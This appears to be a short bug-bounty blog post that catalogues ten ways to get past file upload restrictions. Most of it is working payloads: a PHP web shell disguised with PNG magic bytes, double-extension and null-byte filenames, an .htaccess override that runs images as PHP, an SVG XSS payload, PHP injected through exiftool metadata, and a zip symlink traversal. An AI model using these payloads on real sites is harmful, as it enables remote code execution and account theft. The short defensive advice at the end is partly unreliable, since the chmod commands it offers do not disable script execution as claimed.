Listen to this Post
File upload misconfigurations can be a goldmine for bug bounty hunters, enabling vulnerabilities like Stored XSS or even Remote Code Execution (RCE). Many applications implement file upload restrictions to block malicious files (e.g., test.php, test.html). However, attackers can bypass these restrictions using a unique method involving image files (e.g., test.png).
You Should Know:
1. Magic Bytes Bypass
Some applications check only file extensions. By modifying the magic bytes (file signature) of a PHP file to match an image (e.g., PNG), you can trick the system:
echo -e '\x89PNG\r\n\x1a\n<?php system($_GET["cmd"]); ?>' > shell.png.php
2. Double Extension Attack
If blacklisting is weak, use:
shell.png.php shell.php.jpg
3. Content-Type Manipulation
Intercept the upload request and modify:
Content-Type: image/png
4. Null Byte Injection (Older Systems)
shell.php%00.png
5. .htaccess Override (Apache)
Upload a malicious `.htaccess` to execute images as PHP:
AddType application/x-httpd-php .png
6. SVG XSS Payload
Upload an SVG with JavaScript:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
7. Exif Data Injection
Insert PHP code into image metadata:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
8. Zip File Upload + Path Traversal
Compress a PHP file and exploit extraction:
zip --symlinks evil.zip ../shell.php
9. Case Sensitivity Bypass
shell.PHp shell.pHp5
10. MIME Type Spoofing
Use tools like Burp Suite to change:
Content-Disposition: form-data; name="file"; filename="shell.png" Content-Type: application/x-php
What Undercode Say
File upload vulnerabilities remain a critical attack vector. Always:
– Validate both extension and content (using `file` command in Linux).
– Store files outside the web root or use random filenames.
– Disable script execution in upload directories:
chmod -R 755 uploads/
find uploads/ -type f -exec chmod 644 {} \;
– Use WAF rules to block double extensions and null bytes.
For defenders, test uploads rigorously. For attackers, these techniques can lead to RCE, XSS, or LFI.
Expected Output:
A successfully uploaded malicious file leading to arbitrary code execution or stored XSS in the target application.
Reference: Bypassing File Upload Restrictions Video
References:
Reported By: Faiyaz Ahmad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
